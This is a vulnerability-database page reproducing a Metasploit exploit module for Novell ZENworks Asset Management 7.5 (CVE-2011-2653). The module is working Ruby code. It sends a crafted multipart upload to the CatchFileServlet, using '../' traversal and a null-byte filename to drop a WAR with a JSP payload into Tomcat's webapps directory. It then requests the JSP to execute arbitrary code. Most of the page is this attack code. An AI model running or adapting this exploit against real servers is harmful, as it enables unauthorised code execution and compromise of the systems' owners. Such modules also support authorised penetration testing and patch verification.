Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuan vazquezPACKETSTORM:115512
HistoryAug 14, 2012 - 12:00 a.m.

Novell ZENworks Asset Management Remote Execution

2012-08-1400:00:00
juan vazquez
packetstormsecurity.com
20

0.971 High

EPSS

Percentile

99.7%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Novell ZENworks Asset Management Remote Execution',  
'Description' => %q{  
This module exploits a path traversal flaw in Novell ZENworks Asset Management  
7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file  
outside of the MalibuUploadDirectory and then make a secondary request that allows  
for arbitrary code execution.  
},  
'Author' =>  
[  
'Unknown', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2011-2653' ],  
[ 'OSVDB', '77583' ],  
[ 'BID', '50966' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ],  
[ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ]  
],  
'Privileged' => true,  
'Platform' => [ 'java' ],  
'Targets' =>  
[  
[ 'Java Universal',  
{  
'Arch' => ARCH_JAVA,  
'Platform' => 'java'  
},  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 02 2011'))  
  
register_options(  
[  
Opt::RPORT(8080),  
OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3])  
], self.class )  
end  
  
def exploit  
  
# Generate the WAR containing the payload  
app_base = rand_text_alphanumeric(4+rand(32-4))  
jsp_name = rand_text_alphanumeric(8+rand(8))  
war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s  
  
uid = rand_text_alphanumeric(34).to_s  
  
data = "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"RequestParms\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"rtyp\"\r\n\r\n"  
data << "prod\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"sess\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"mode\"\r\n\r\n"  
data << "newreport\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"dp\"\r\n\r\n"  
data << "n\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"oldentry\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"act\"\r\n\r\n"  
data << "malibu.StartImportPAC\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"saveact\"\r\n\r\n"  
data << "malibu.StartImportPAC\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"isalert\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"queryid\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"Locale\"\r\n\r\n"  
data << "MM/dd/yyyy\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"CurrencySym\"\r\n\r\n"  
data << "$\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"CurrencyPos\"\r\n\r\n"  
data << "start\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"ThousandsSep\"\r\n\r\n"  
data << ",\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"CurDecimalPt\"\r\n\r\n"  
data << ".\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"MinusSign\"\r\n\r\n"  
data << "-\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"sum\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"grp\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"col\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"PreLoadRight\"\r\n\r\n"  
data << "yes\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n"  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"uploadFile\"; filename=\"/#{"../" * datastore['DEPTH']}#{app_base}.war\x00.txt\"\r\n"  
data << "Content-Type: application/octet-stream\r\n\r\n"  
data << war_data  
data << "\r\n"  
data << "------#{uid}\r\n"  
data << "Content-Disposition: form-data; name=\"SuccessPage\"\r\n\r\n"  
data << "Html/UploadSuccess.html\r\n"  
data << "------#{uid}--\r\n"  
  
res = send_request_cgi(  
{  
'uri' => "/rtrlet/catch",  
'method' => 'POST',  
'ctype' => "multipart/form-data; boundary=----#{uid}",  
'data' => data,  
})  
  
print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")  
  
select(nil, nil, nil, 10)  
  
if (res.code == 500)  
print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")  
send_request_raw(  
{  
'uri' => "/#{app_base}/" + "#{jsp_name}" + '.jsp',  
'method' => 'GET',  
})  
else  
print_error("WAR upload failed...")  
end  
  
end  
  
end  
`

Related

zdi 1
cve 1
checkpoint_advisories 1
dsquare 1
prion 1
saint 4
d2 1
securityvulns 2
zdi
zdi
Novell ZENworks Asset Management Remote Code Execution Vulnerability
2011-12-07 00:00:00
cve
cve
CVE-2011-2653
2011-12-08 11:55:00
checkpoint_advisories
checkpoint_advisories
Novell ZENworks Asset Management Directory Traversal (CVE-2011-2653)
2013-06-06 00:00:00
dsquare
dsquare
Novell ZENWorks Asset Management 7.5 File Upload
2012-04-30 00:00:00
prion
prion
Directory traversal
2011-12-08 11:55:00
saint
saint
Novell ZENworks Asset Management rtrlet File Upload Traversal
2012-10-09 00:00:00
Novell ZENworks Asset Management rtrlet File Upload Traversal
2012-10-09 00:00:00
Novell ZENworks Asset Management rtrlet File Upload Traversal
2012-10-09 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_ZAM
2011-12-08 11:55:00
securityvulns
securityvulns
ZDI-11-342 : Novell ZENworks Asset Management Remote Code Execution Vulnerability
2011-12-11 00:00:00
Novell ZENworks Asset Management directory traversal
2011-12-11 00:00:00

0.971 High

EPSS

Percentile

99.7%

JSON
Related for PACKETSTORM:115512
zdi1cve1checkpoint_advisories1dsquare1prion1saint4d21securityvulns2